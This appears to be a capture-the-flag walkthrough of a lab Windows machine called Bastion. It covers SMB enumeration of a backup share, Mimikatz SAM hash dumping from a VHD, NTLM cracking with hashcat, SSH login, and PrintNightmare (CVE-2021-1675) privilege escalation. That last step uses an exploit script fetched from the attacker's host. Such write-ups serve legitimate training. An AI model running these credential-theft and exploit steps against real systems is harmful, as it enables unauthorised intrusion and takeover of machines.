Skip to content

Overview

Walkthrough

Recon

nmap

PORT    STATE SERVICE      REASON  VERSION
22/tcp  open  ssh          syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
|   256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open  msrpc        syn-ack Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Enumerating SMB Shares

OldBoxes/bastian  smbclient -L \\\\10.10.10.134 -U 'anonymouse' -N 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    Backups         Disk      
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
bastian/dump  smbclient \\\\10.10.10.134\\backups -U 'anonymouse' -N 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> timeout 1000000
io_timeout per operation is now 1000000
smb: \> mget * 

Enumerating Win Hard Disk

Run Mimikatz inside VHD to found the user L4mpje NTLM hash: 26112010952d963c8dc4217daec986d9

mimikatz # lsadump::sam /system:SYSTEM /sam:SAM
Domain : L4MPJE-PC
SysKey : 8b56b2cb5033d8e2e289c26f8939a25f
Local SID : S-1-5-21-18827714-3633218324-154007371
SAMKey : 335e6c10b1dce6433e9ef82d30f49d3a
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID  : 000001f5 (501)
User : Guest
RID  : 000003e8 (1000)
User : L4mpje
  Hash NTLM: 26112010952d963c8dc4217daec986d9

Then crack it using hashcat

Ξ bastian/dump  hashcat -a 0 -m 1000 l4mpje-ntlm /usr/share/wordlists/rockyou.txt  
hashcat (v6.1.1) starting...

....

26112010952d963c8dc4217daec986d9:bureaulampje    

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 26112010952d963c8dc4217daec986d9

Then login into SSH

bastian/dump  ssh L4mpje@10.10.10.134 
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje\Desktop>more user.txt                                                                            
9bfe57d5c3309db3a151772f9d86c6cd      

Privilege Escalation

PrintNightmare (CVE 2021-1675)

PS C:\Users\L4mpje\Videos> Invoke-WebRequest "http://10.10.14.27:9001/CVE-2021-1675.ps1"

PS C:\Users\L4mpje\Videos> . .\CVE-2021-1675.ps1  
PS C:\Users\L4mpje\Videos> Invoke-Nightmare                                                                                     
[+] using default new user: adm1n                                                                                               
[+] using default new password: P@ssw0rd                                                                                        
[+] created payload at C:\Users\L4mpje\AppData\Local\Temp\nightmare.dll                                                         
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_1734185bdb8f8610\Amd64\mxdwdrv.dll"   
[+] added user  as local administrator                                                                                          
[+] deleting payload from C:\Users\L4mpje\AppData\Local\Temp\nightmare.dll                                                      
PS C:\Users\L4mpje\Videos> net users                                                                                            

User accounts for \\BASTION                                                                                                     

-------------------------------------------------------------------------------                                                 
adm1n                    Administrator            DefaultAccount                                                                
Guest                    L4mpje                                                                                                 
The command completed successfully. 
bastian/dump  ssh adm1n@10.10.10.134 
adm1n@10.10.10.134's password: 
dPermission denied, please try again.
adm1n@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                 
(c) 2016 Microsoft Corporation. All rights reserved.                                                   

adm1n@BASTION C:\Users\Administrator\Desktop>more root.txt                                             
958850b91811676ed6620a9c430e65c8